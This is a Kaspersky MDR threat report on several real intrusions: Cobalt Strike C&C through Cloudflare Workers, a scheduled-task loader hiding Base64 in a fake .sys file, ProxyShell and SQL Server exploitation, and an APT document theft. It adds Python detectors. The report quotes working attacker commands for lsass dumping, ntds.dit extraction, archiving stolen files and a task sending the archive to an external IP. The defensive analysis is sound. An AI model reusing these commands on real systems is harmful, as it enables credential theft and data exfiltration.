Introduction
This report describes several interesting incidents observed by the Kaspersky Managed Detection and Response (MDR) team. The goal of the report is to inform our customers about techniques used by attackers. We hope that learning about the attacks that took place in the wild helps you to stay up to date on the modern threat landscape and to be better prepared for attacks.
Command and control via the public cloud
The use of public cloud services like Amazon, Azure or Google can make an attacker’s server difficult to spot. Kaspersky has reported several incidents where attackers used cloud services for C&C.
Case #1: Cloudflare Workers as redirectors
Case description
The incident started with Kaspersky MDR detecting the use of a comprehensive toolset for security assessment, presumably Cobalt Strike, by an antimalware (AM) engine memory scan (MEM:Trojan.Win64.Cobalt.gen). The memory space belonged to the process c:\windows\system32\[legitimate binary name][1].exe.
While investigating, we found that the process had initiated network connections to a potential C&C server:
    hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/jquery/secrets/[random sequence]
    hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/mails/images/[cut out]?_udpqjnvf=[cut out]
The URL format indicates the use of Cloudflare Workers.
We then found that earlier, the binary had unsuccessfully[2] attempted to dump the memory of lsass.exe via comsvcs.dll:
    CMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\[filename].doc full
Several minutes later, a suspicious .bat script was run. This created a suspicious WMI consumer, later classified by MDR as an additional persistence mechanism.
The incident was detected in a timely manner, so the attacker did not have the time to follow through. The attacker’s final goals are thus unknown.
Case detection
The table below lists the signs of suspicious activity that were the starting point for the investigation by the SOC.
| MITRE ATT&CK Technique | Detection details | Description |
| --- | --- | --- |
| T1588.002: Tool | AM verdict: MEM:Trojan.Win64.Cobalt.gen, which can be used for Cobalt Strike or Meterpreter | A malicious payload was executed in the victim’s system and started communicating with the C&C server |
| T1620: Reflective Code Loading | AM verdict: MEM:Trojan.Win64.Cobalt.gen | The malicious payload migrated to the victim’s memory |
| | Detection of code injection from an unknown binary into a system binary | |
| T1071.001: Web Protocols | Suspicious HTTP connections to the malicious URL blue-rice-1d8e[.]dropboxonline.workers.dev/… from a non-browser process with a system integrity level | The attacker’s communications with the C&C server |
| T1584.006: Web Services | URL reputation, regular expression in URL | The attacker’s communications with the C&C server |
| T1102.001: Dead Drop Resolver | URL reputation, regular expression in URL | The attacker’s communications with the C&C server |
| T1003.001: LSASS Memory | AM detection on lsass memory access | The attacker’s unsuccessful attempt to dump the lsass.exe memory to a file |
| | Regex on a command line like: rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <PID> lsass.dmp full | |
| T1546.003: Windows Management Instrumentation Event Subscription | WMI active script event consumer created remotely | The attacker gained persistence through active WMI |
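The comsvcs.dll MiniDump regex named in the table, worked into a small Python detector. This is an added example and not code from Kaspersky or the report: it runs over constructed command lines (the case's obfuscated for-loop variant with `[filename].doc` kept as the report elides it, the canonical form from the table, a variant that calls the MiniDump export by its ordinal `#24`, and a benign rundll32 call) and records the evasions the case shows: the PID resolved inside the same command, and the dump written under a document extension. Field names are the example's own.

```python
import re

# Constructed sample command lines (two modelled on the case, one benign, one ordinal variant).
SAMPLE_COMMAND_LINES = [
    r'''CMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\[filename].doc full''',
    r"rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 624 lsass.dmp full",
    r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
    r"rundll32.exe C:\Windows\System32\comsvcs.dll, #24 624 C:\Temp\out.bin full",
]

# rundll32 may appear without .exe, comsvcs.dll as a bare name or a full path, and the
# MiniDump export either by name or by its ordinal (#24); a comma and whitespace are optional.
MINIDUMP_RE = re.compile(
    r"rundll32(?:\.exe)?\s+\S*comsvcs(?:\.dll)?\s*,?\s*(?:#24|minidump)\s+"
    r"(?P<pid>\S+)\s+(?P<out>\S+)\s+full",
    re.IGNORECASE,
)
# A tasklist/find pair in the same command line means the PID was looked up on the fly.
LSASS_LOOKUP_RE = re.compile(r"tasklist.*lsass|find\s+\"lsass\"", re.IGNORECASE)


def analyze_command_line(cmd):
    """Return a finding dict if cmd is a comsvcs.dll MiniDump invocation, else None."""
    m = MINIDUMP_RE.search(cmd)
    if not m:
        return None
    pid, out = m.group("pid"), m.group("out")
    return {
        "technique": "T1003.001",
        "pid_argument": pid,
        "output_file": out,
        # A for-loop variable (^%B or %B) instead of a literal PID, as in the case.
        "pid_from_loop": pid.startswith(("^%", "%")),
        "lsass_lookup_in_command": bool(LSASS_LOOKUP_RE.search(cmd)),
        # Dump written with a non-.dmp extension (here .doc) to pass as a document.
        "disguised_extension": not out.lower().endswith(".dmp"),
    }


def scan(command_lines):
    """Apply the detector to a batch of command lines; returns (cmd, finding) pairs."""
    hits = []
    for cmd in command_lines:
        finding = analyze_command_line(cmd)
        if finding:
            hits.append((cmd, finding))
    return hits


if __name__ == "__main__":
    for cmd, finding in scan(SAMPLE_COMMAND_LINES):
        print(finding["technique"], finding["output_file"], finding)
```

Matching on the export rather than on `lsass.dmp` is deliberate: the case wrote its dump under a `.doc` name, and a regex anchored on the output filename would have missed it.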
Payload hidden in long text
Case #1: A scheduled task that loads content from a long text file
Case description
This case started with a suspicious scheduled task. The listing below should give you a general idea of the task and the command it executes.
Scheduled task:
    Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9,
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A311AA10-BBF3-4CDE-A00B-AAAAB3136D6A},
    C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9
Command:
    "wscript.exe" /e:vbscript /b "C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys'), 1874201, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"
The scheduled task invokes a VBS script (file path: C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C, MD5 106BC66F5A6E62B604D87FA73D70A708), which reads a fragment of the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys, Base64-decodes it and executes the decoded content.
The VBS script mimics the content and behavior of the legitimate C:\Windows\System32\SyncAppvPublishingServer.vbs file, but the path and file name are different.
The customer approved our MDR SOC analyst’s request to analyze the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys. A quick analysis revealed a Base64-encoded payload inside long text content (see the picture below).
The decoded payload contained a link to a C&C server:
Further telemetry analysis showed that the infection was probably caused by the following process, likely a malicious activator (MD5 F0829E688209CA94305A256B25FEFAF0):
    C:\Users\<… cut out … >\Downloads\ExcelAnalyzer 3.4.3\crack\Patch.exe
The activator was downloaded with the Tixati BitTorrent client and executed by a member of the local Administrators group.
Fortunately, the telemetry analysis did not reveal any evidence of malicious activity from the discovered C&C server (counter[.]wmail-service[.]com), which would have allowed further stages of the infection to be downloaded. In the meantime, a new AM engine signature was released, and the malicious samples are now detected as Trojan-Dropper.Win64.Agent.afp (F0829E688209CA94305A256B25FEFAF0) and Trojan.PowerShell.Starter.o (106BC66F5A6E62B604D87FA73D70A708). The C&C URL was correctly classified as malicious.
Case detection
The table below lists the attack techniques and how they were detected by Kaspersky MDR.
| MITRE ATT&CK Technique | Detection details | Description |
| --- | --- | --- |
| T1547.001: Registry Run Keys / Startup Folder | Regex on autostart entry details | Malicious persistence |
| | Heuristic AM engine verdict: HEUR:Trojan.Multi.Agent.gen | |
| T1059.001: PowerShell | Regex on autostart entry details | Execution of PowerShell code via “ScriptBlock” instead of “Invoke-Expression” |
| T1216.001: System Script Proxy Execution | Regex on command line | Malicious payload execution via C:\Windows\System32\SyncAppvPublishingServer.vbs |
| T1204.002: Malicious File | Execution sequence: svchost.exe → explorer.exe → patch.exe, from the directory C:\Users\<removed>\Downloads\ExcelAnalyzer 3.4.3\crack\ | The user executed a file downloaded by the Tixati BitTorrent client. As a result, the file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was created |
| | Creation of c:\users\<removed>\downloads\excelanalyzer 3.4.3\setup_excelanalyzer.exe, in this order: chrome.exe → tixati.exe | |
| | Creation of 02f4f239-0922-49fe-a338-c7460cb37d95.sys, in this order: svchost.exe → patch.exe. Process command line: “C:\Users\<removed>\Downloads\ExcelAnalyzer 3.4.3\crack\Patch.exe”. The contents of 02f4f239-0922-49fe-a338-c7460cb37d95.sys do not match the extension (text instead of binary). | |
| T1027: Obfuscated Files or Information; T1140: Deobfuscate/Decode Files or Information | The suspicious file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was requested from the customer via an MDR response | 02f4f239-0922-49fe-a338-c7460cb37d95.sys contained text; starting on line 4890, it contained a Base64-encoded payload. The attacker hid the payload |
| T1071.001: Web Protocols | The SOC checked for successful connections to the discovered C&C server. | A search for the attacker’s possible attempts to execute further stages of the attack |
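The loader command line and the "contents do not match the extension" detail from the table, as an added Python triage helper that is not part of the report: it pulls the path, byte offset and byte count out of the `GetString(ReadAllBytes(...), index, count)` call in the task's command line, carves and Base64-decodes that slice from a file without executing it, and checks whether a supposed `.sys` file is actually a PE image or plain text. The fake `.sys` file, its filler text and the hidden script are constructed for the example; the command line fragment is the one from the case.

```python
import base64
import re

# GetString(bytes, index, count) takes a byte offset and a byte count; the task's
# command line passes ReadAllBytes(path), offset, count in exactly that order.
READ_SLICE_RE = re.compile(
    r"ReadAllBytes\('(?P<path>[^']+)'\)\s*,\s*(?P<offset>\d+)\s*,\s*(?P<count>\d+)"
)


def parse_slice_parameters(command_line):
    """Return (path, offset, count) from a GetString(ReadAllBytes(...), i, n) call, or None."""
    m = READ_SLICE_RE.search(command_line)
    if not m:
        return None
    return m.group("path"), int(m.group("offset")), int(m.group("count"))


def carve_base64_payload(data, offset, count):
    """Decode the Base64 run the loader would execute, for analysis only (never executed)."""
    chunk = data[offset:offset + count]
    return base64.b64decode(chunk, validate=True).decode("utf-8")


def looks_like_pe(data):
    """A genuine driver (.sys) is a PE image and starts with the 'MZ' DOS header."""
    return data[:2] == b"MZ"


def text_ratio(data):
    """Fraction of printable ASCII/whitespace bytes; close to 1.0 means text, not a binary."""
    if not data:
        return 0.0
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data)


def triage(data, offset, count):
    """Summarise one suspect file the way the SOC row above describes it."""
    return {
        "is_pe": looks_like_pe(data),
        "text_ratio": round(text_ratio(data), 3),
        "decoded_payload": carve_base64_payload(data, offset, count),
    }


# Constructed sample: filler text with a Base64-encoded, harmless script buried inside,
# standing in for the real 02F4F239-... file (which is not reproduced here).
HIDDEN_SCRIPT = "Write-Host 'constructed payload, nothing malicious here'"
_ENCODED = base64.b64encode(HIDDEN_SCRIPT.encode("utf-8")).decode("ascii")
_FILLER_LINE = "Lorem ipsum dolor sit amet, consectetur adipiscing elit.\n"
FAKE_SYS = (
    (_FILLER_LINE * 50).encode("utf-8")
    + _ENCODED.encode("ascii")
    + (_FILLER_LINE * 50).encode("utf-8")
)
PAYLOAD_OFFSET = len(_FILLER_LINE) * 50
PAYLOAD_COUNT = len(_ENCODED)

# The relevant fragment of the scheduled task's command line from the case.
CASE_COMMAND_LINE = (
    r"$sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes("
    r"'C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys'), 1874201, 422);"
)

if __name__ == "__main__":
    print(parse_slice_parameters(CASE_COMMAND_LINE))
    print(triage(FAKE_SYS, PAYLOAD_OFFSET, PAYLOAD_COUNT))
```

The offset and count recovered from the command line tell an analyst exactly which bytes to carve, so the payload can be decoded for review without running the loader, and the PE-header and text-ratio checks reproduce the extension mismatch the SOC used as a signal.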
Server-side attacks on the perimeter
Case #1: A ProxyShell vulnerability in Microsoft Exchange
Case description
During manual threat hunting, the Kaspersky SOC team detected suspicious activity on a Microsoft Exchange server: the process MSExchangeMailboxReplication.exe attempted to create several suspicious files:
    \\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rqfja.aspx
    c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\yjiba.aspx
    c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\jiwkl.aspx
    c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\qwezb.aspx
    c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\qspwi.aspx
    c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\premium\upxnl.aspx
    c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\qikyp.aspx
    c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\resources\jvdyt.aspx
    c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\mgsjz.aspx
The ASPX file format, which the service should not create, and the random file names led our SOC analyst to believe that those files were web shells.
Telemetry analysis of the suspicious file creation attempts showed that Kaspersky Endpoint Security (KES) had identified the process behavior as PDM:Exploit.Win32.Generic and blocked some of the activities.
Similar behavior was detected the next day, this time an attempt at creating one file:
    \\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rmvbe.aspx
KES had blocked the exploitation attempts. Nonetheless, the attempts themselves indicated that the Microsoft Exchange server was vulnerable and in need of patching as soon as possible.
Case detection
The table below lists the attack techniques and how these were detected by Kaspersky MDR.
| MITRE ATT&CK Technique | Detection details | Description |
| --- | --- | --- |
| T1190: Exploit Public-Facing Application | Heuristic AM engine verdict: PDM:Exploit.Win32.Generic | Exploitation attempt |
| T1505.003: Web Shell | Attempts at creating ASPX files using the MSExchangeMailboxReplication.exe process | Web shell file creation |
Case #2: MS SQL Server exploitation
Case description
The incident was detected due to suspicious activity exhibited by sqlservr.exe, a legitimate Microsoft SQL Server process. At the time of detection, the account active on the host was S-1-5-21-<…>-<…>-<…>-181797 (Domain / username).
The SQL Server process attempted to create a suspicious file:
    c:\windows\serviceprofiles\mssql$sqlexpress\appdata\local\temp\tmpd279.tmp
We observed that a suspicious assembly, db_0x2D09A3D6\65536_fscbd (MD5 383D20DE8F94D12A6DED1E03F53C1E16, original file name evilclr.dll), was loaded into the SQL Server process (c:\program files\microsoft sql server\mssql15.sqlexpress\mssql\binn\sqlservr.exe).
The file was detected by the AM engine as HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b.
The SQL Server host had previously been seen to be accessible from the Internet and to be undergoing scanning from the TOR network.
After the suspicious assembly load, the AM engine detected execution of malicious SQL jobs. The SQL jobs contained obfuscated PowerShell commands. For example:
The created SQL jobs attempted to connect to URLs like those shown below:
    hxxp://101.39.<…cut…>.58:16765/2E<…cut…>2F.Png
    hxxp://103.213.<…cut…>.55:15909/2E<…cut…>2F.Png
    hxxp://117.122.<…cut…>.10:19365/2E<…cut…>2F.Png
    hxxp://211.110.<…cut…>.208:19724/2E<…cut…>2F.Png
    hxxp://216.189.<…cut…>.94:19063/2E<…cut…>2F.Png
    hxxp://217.69.<…cut…>.139:13171/2E<…cut…>2F.Png
    hxxp://222.138.<…cut…>.26:17566/2E<…cut…>2F.Png
    hxxp://222.186.<…cut…>.157:14922/2E<…cut…>2F.Png
    hxxp://45.76.<…cut…>.180:17128/2E<…cut…>2F.Png
    hxxp://59.97.<…cut…>.243:17801/2E<…cut…>2F.Png
    hxxp://61.174.<…cut…>.163:15457/2E<…cut…>2F.Png
    hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png
    hxxp://216.189.<…cut…>.94:19063/2E<…cut…>2F.Png
    hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png
Some of the IP addresses were already on the deny list, while others were added in response to this incident.
We were not able to observe any other host within the monitoring scope attempt to connect to these IP addresses, which confirmed that the attack was detected at an early stage.
The next day, the same activity, with the same verdicts (HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b) was detected on another SQL Server host, which was also accessible from the Internet.
Since the attack was detected in time, and its further progress was blocked by the AM engine, the attacker was not able to proceed, while the customer corrected the network configuration errors to block access to the server from the Internet.
Case detection
The table below lists the attack techniques and how these were detected by Kaspersky MDR.
| MITRE ATT&CK Technique | Detection details | Description |
| --- | --- | --- |
| T1090.003: Multi-hop Proxy; T1595.002: Vulnerability Scanning | Reputation analysis showed the use of the TOR network for scanning. The scanning activity was detected through network connection analysis and by the AM engine. | The attacker scanned the SQL Server host |
| T1190: Exploit Public-Facing Application | The server application sqlservr.exe launched powershell.exe, in the following order: services.exe → sqlservr.exe → powershell.exe | The attacker successfully exploited the SQL server |
| | Execution of the object previously detected as an autostart entry with a bad reputation: sql:\SQLEXPRESS\db_0x2D09A3D6\65537_fscbd; original file name: evilclr.dll | |
| T1059.001: PowerShell | Command line analysis showed the use of PowerShell. | Malicious persistence via an SQL Server job |
| T1027: Obfuscated Files or Information | Regex- and ML-based analysis of the SQL Server Agent job command line | The attacker attempted to evade detection |
| | Regex- and ML-based analysis of the command line in the services.exe → sqlservr.exe → powershell.exe execution sequence | |
| T1505.001: SQL Stored Procedures | SQL Server Agent job analysis | Malicious persistence via an SQL Server job |
| | Heuristic detects on PowerShell SQL Server Agent; verdict: HEUR:Trojan.Multi.Powecod.a | |
| T1071.001: Web Protocols | The URL reputation as well as an AM generic heuristic verdict similar to HEUR:Trojan.Multi.GenBadur.genw pointed to the use of a malicious C&C server. | The attacker’s C&C server |
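Both server-side cases above come down to a server process doing something it never should: the Exchange Mailbox Replication service writing ASPX files into web-served directories (Case #1), and sqlservr.exe spawning powershell.exe (Case #2). The following Python detector is an added example, not Kaspersky's code, applied to constructed telemetry events. The file paths and the process chain are taken from the two cases; the host names, the event record layout and the benign control events are assumptions of the example.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class Event:
    kind: str            # "file_create" or "process_start"
    host: str
    process: str         # image name of the acting (file_create) or new (process_start) process
    ancestry: List[str]  # parent chain, root first, e.g. ["services.exe", "sqlservr.exe"]
    target: str = ""     # created file path, or the command line for process_start


# Server processes that have no legitimate reason to write web content or spawn shells.
SERVER_PROCESSES = {"msexchangemailboxreplication.exe", "sqlservr.exe", "w3wp.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Directory fragments that IIS/Exchange serve over HTTP (from the Case #1 file list).
WEBROOT_MARKERS = ("\\inetpub\\wwwroot\\", "\\frontend\\httpproxy\\")


def detect(event):
    """Return (technique, reason) for a suspicious event, or None for benign ones."""
    proc = event.process.lower()
    chain = [p.lower() for p in event.ancestry]
    if event.kind == "file_create":
        path = event.target.lower()
        if proc in SERVER_PROCESSES and path.endswith(".aspx") and any(m in path for m in WEBROOT_MARKERS):
            return ("T1505.003", f"{event.process} wrote {event.target}")
    elif event.kind == "process_start":
        if proc in SHELLS and any(p in SERVER_PROCESSES for p in chain):
            return ("T1190", " -> ".join(event.ancestry + [event.process]))
    return None


def scan(events):
    """Run the detector over a batch of events; returns (host, technique, reason) tuples."""
    hits = []
    for e in events:
        hit = detect(e)
        if hit:
            hits.append((e.host, hit[0], hit[1]))
    return hits


# Constructed telemetry modelled on the two cases (paths from the report, hosts invented).
SAMPLE_EVENTS = [
    Event("file_create", "exch01", "MSExchangeMailboxReplication.exe", ["services.exe"],
          r"\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rqfja.aspx"),
    Event("file_create", "exch01", "MSExchangeMailboxReplication.exe", ["services.exe"],
          r"c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\jiwkl.aspx"),
    # Benign control: the same service writing an ordinary log file.
    Event("file_create", "exch01", "MSExchangeMailboxReplication.exe", ["services.exe"],
          r"c:\program files\microsoft\exchange server\v15\logging\mailboxreplication\mrs.log"),
    Event("process_start", "sql02", "powershell.exe", ["services.exe", "sqlservr.exe"],
          "powershell.exe -NoProfile -Command (constructed)"),
    # Benign control: a user launching PowerShell from the desktop shell.
    Event("process_start", "ws15", "powershell.exe", ["explorer.exe"], "powershell.exe"),
]

if __name__ == "__main__":
    for host, technique, reason in scan(SAMPLE_EVENTS):
        print(host, technique, reason)
```

The checks are deliberately narrow (specific server image names, served directories, shell children) so that the rule stays quiet on an ordinary Exchange or SQL host and fires on exactly the two behaviours the SOC used as its starting point.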
What does exfiltration in a real-life APT look like?
Case #1: Collecting and stealing documents
Case description
Kaspersky MDR detected suspicious activity on one particular host in the customer’s infrastructure, as the following process was started remotely by psexec:
    "cmd.exe" /c "c:\perflogs\1.bat"
which in turn started:
    findstr "10.<…cut…>.
    wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username1>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1
    wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username2>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1
After that, the following inventory commands were executed by the binary C:\ProgramData\USOPrivate\UpdateStore\windnphd.exe:
    C:\Windows\system32\cmd.exe /C ping 10.<…cut…> -n 2
    query user
    C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password>
    C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3>
    C:\Windows\system32\cmd.exe /C net group "domain admins" /domain
    C:\Windows\system32\cmd.exe /C ping <hostname1>
    C:\Windows\system32\cmd.exe /C vssadmin list shadows
    C:\Windows\system32\cmd.exe /C ipconfig /all
    C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$
Suspicious commands triggering actions on the Active Directory database were executed:
    C:\Windows\system32\cmd.exe /C ntdsutil snapshot "activate instance ntds" create quit
    C:\Windows\system32\cmd.exe /C dir c:\windows\system32\ntds.dit
    C:\Windows\system32\cmd.exe /C dir c:\
    C:\Windows\system32\cmd.exe /C dir c:\windows\ntds\ntds.dit
    hxxp[:]//31.192.234[.]60:53/useintget
    nd.exe c:\windows\system32\config\system c:\users\public\sys.txt
    nd.exe c:\windows\ntds\ntds.dit c:\users\public\nt.txt
    C:\Windows\system32\cmd.exe /C move *.txt c:\users\public\tmp
    C:\Windows\system32\cmd.exe /C rar.exe a -k -r -s -m1 c:\users\public\n.rar c:\users\public\tmp\
    rar.exe a -k -r -s -m1 c:\users\public\n.rar c:\users\public\tmp\
    schtasks /create /sc minute /mo 30 /ru system /tn \tmp /tr "c:\users\public\s.exe c:\users\public\0816-s.rar 38[.]54[.]14[.]183 53 down" /f
This executable used the archive c:\users\public\0816-s.rar and the suspicious IP address 38[.]54[.]14[.]183, located in Vietnam, as parameters.
The 0816-s.rar archive was created via remote execution of the following command through psexec:
    rar a -k -r -s -ta[Pass_in_clear_text] -m1 c:\users\public\0816-s.rar "\\10.<…cut…>\c$\users\<username4>\Documents\<DocumentFolder1>"
After that, we detected a suspicious network connection to the IP address 38[.]54[.]14[.]183 from the s.exe executable. The activity looked like an attempt to transfer the data collected during the attack to the attacker’s C&C server.
Similar suspicious behavior was detected on another host, <hostname>.
First, a suspicious file was created over the SMB protocol: c:\users\public\winpdasd.exe (MD5: B83C9905F57045110C75A950A4EE56E4).
Next, a task was created remotely via psexec.exe:
    schtasks /create /sc minute /mo 30 /ru system /tn \tmp /tr "c:\users\public\winpdasd.exe" /f
During task execution, an external network communication was detected, and certain discovery commands were executed:
    hxxp://31[.]192.234.60:53/useintget
    ping 10.<…cut…> -n 1
    query user
    net use
This was followed by a connection to a network share on the host 10.<…cut…> as username3:
    C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3>
More reconnaissance command executions were detected:
    C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$\users\<username4>\AppData\Roaming\Adobe\Linguistics
    C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password> |findstr rundll32.exe
    tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password>
    C:\Windows\system32\cmd.exe /C taskkill /S 10.<…cut…> -U <domain>\<username3> -P <password> /pid <PID> /f
    C:\Windows\system32\cmd.exe /C schtasks /run /s 10.<…cut…> /u <domain>\<username3> /p "<password>" /tn \Microsoft\Windows\Tcpip\dcrpytod
Then winpdasd.exe created the file windpchsvc.exe (MD5: AE03B4C183EAA7A4289D8E3069582930) and set it up as a task:
    C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 30 /ru system /tn \Microsoft\Windows\Network\windpch /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\windpchsvc.exe" /f
After that, C&C communications were detected:
    hxxp://139.162.35[.]70:53/micsoftgp
This incident, a fragment of a long-running APT campaign, demonstrates a data collection scenario. It shows that the attacker’s final goal was to spy on and monitor the victim’s IT infrastructure. Another feature of targeted attacks that can be clearly seen from this incident is the use of custom tools. An analysis of these is given later in this report as an example.
Case detection
The table below lists the attack techniques and how these were detected by Kaspersky MDR.
| MITRE ATT&CK Technique | Detection details | Description |
| --- | --- | --- |
| T1569.002: Service Execution | Command line analysis | The attacker performed reconnaissance and searched the local logs. The attacker persisted in the victim’s system through service creation |
| | Windows events on service installation and service start | |
| | AM behavior analysis | The attacker executed windnphd.exe through psexec |
| T1592: Gather Victim Host Information; T1590: Gather Victim Network Information | Command line analysis | The attacker performed internal reconnaissance |
| T1021.002: SMB/Windows Admin Shares | Inbound and outbound share access | The attacker tried to access \\10.<…cut…>.65\ipc$ and \\10.<…cut…>.52\c$ |
| T1003.003: NTDS | Command line analysis | The attacker accessed NTDS.dit with ntdsutil |
| T1071.001: Web Protocols | The SOC checked whether the data transfer was successful | The attacker communicated with the C&C server at hxxp[:]//31.192.234[.]60:53/useintget |
| | The connection was initiated by the suspicious process windnphd.exe | |
| T1571: Non-Standard Port | The SOC detected the use of the HTTP protocol on the non-standard port 53/TCP | The attacker used the C&C server hxxp[:]//31.192.234[.]60:53/useintget |
| T1587.001: Malware | Use of various suspicious binaries prepared by the attacker specifically for this attack | The attacker used custom tools: s.exe, winpdasd.exe and windpchsvc.exe (see the detailed analysis below) |
| T1497: Virtualization/Sandbox Evasion | Detection of the HookSleep function (see below) | The attacker attempted to detect sandboxing. The emulation detection was found in the custom tools winpdasd.exe and windpchsvc.exe |
| T1036.005: Match Legitimate Name or Location | Operations with the file c:\users\Default\ntusers.dat | The attacker attempted to hide shellcode inside a file with a name similar to the legitimate ntuser.dat |
| T1140: Deobfuscate/Decode Files or Information | The file ntusers.dat contained encoded shellcode, which was later executed by winpdasd.exe and windpchsvc.exe | The attacker executed arbitrary code |
| T1560.001: Archive via Utility | Use of the RAR archiver for data collection | The attacker archived the stolen credentials and documents |
| T1048.003: Exfiltration Over Unencrypted Non-C2 Protocol | Command line analysis | The attacker used a custom tool to exfiltrate data |
| | Analysis of the process that initiated the connection | |
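The T1571 row above (HTTP over 53/TCP) is one of the cheapest signals in this case to reproduce from network telemetry. The Python below is an added example, not code from the report: it looks for an HTTP request line in the first client bytes of a TCP connection and flags it when the destination port is not one where HTTP is expected. The connection records are constructed; the two destination addresses and URL paths are the C&C endpoints named in the case, and the DNS-over-UDP and port-80 records are benign controls to show the rule ignoring legitimate port-53 and port-80 traffic.

```python
import re

# Ports on which an HTTP request line is expected; anything else is worth a look.
HTTP_PORTS = {80, 443, 8000, 8080, 8443}
REQUEST_LINE_RE = re.compile(rb"^(GET|POST|PUT|HEAD|OPTIONS) (\S+) HTTP/1\.[01]\r\n")


def is_http_request(first_bytes):
    """True if the client's first bytes form an HTTP/1.x request line."""
    return REQUEST_LINE_RE.match(first_bytes) is not None


def flag_nonstandard_http(records):
    """records: dicts with src, dst, dport, proto and payload (first bytes the client sent).

    Returns one T1571 finding per TCP connection that speaks HTTP on a non-HTTP port.
    """
    findings = []
    for r in records:
        if r["proto"] != "tcp":
            continue                      # DNS on 53/UDP is not HTTP and must not fire
        m = REQUEST_LINE_RE.match(r["payload"])
        if m is None or r["dport"] in HTTP_PORTS:
            continue
        findings.append({
            "technique": "T1571",
            "src": r["src"],
            "dst": r["dst"],
            "dport": r["dport"],
            "path": m.group(2).decode("ascii", "replace"),
        })
    return findings


# Constructed records: the two C&C contacts from the case on 53/TCP, a real DNS query
# on 53/UDP, and ordinary web traffic on 80/TCP.
SAMPLE_RECORDS = [
    {"src": "10.0.0.5", "dst": "31.192.234.60", "dport": 53, "proto": "tcp",
     "payload": b"GET /useintget HTTP/1.1\r\nHost: 31.192.234.60:53\r\n\r\n"},
    {"src": "10.0.0.9", "dst": "139.162.35.70", "dport": 53, "proto": "tcp",
     "payload": b"GET /micsoftgp HTTP/1.1\r\nHost: 139.162.35.70:53\r\n\r\n"},
    {"src": "10.0.0.5", "dst": "10.0.0.1", "dport": 53, "proto": "udp",
     "payload": b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"},
    {"src": "10.0.0.5", "dst": "93.184.216.34", "dport": 80, "proto": "tcp",
     "payload": b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"},
]

if __name__ == "__main__":
    for f in flag_nonstandard_http(SAMPLE_RECORDS):
        print(f)
```

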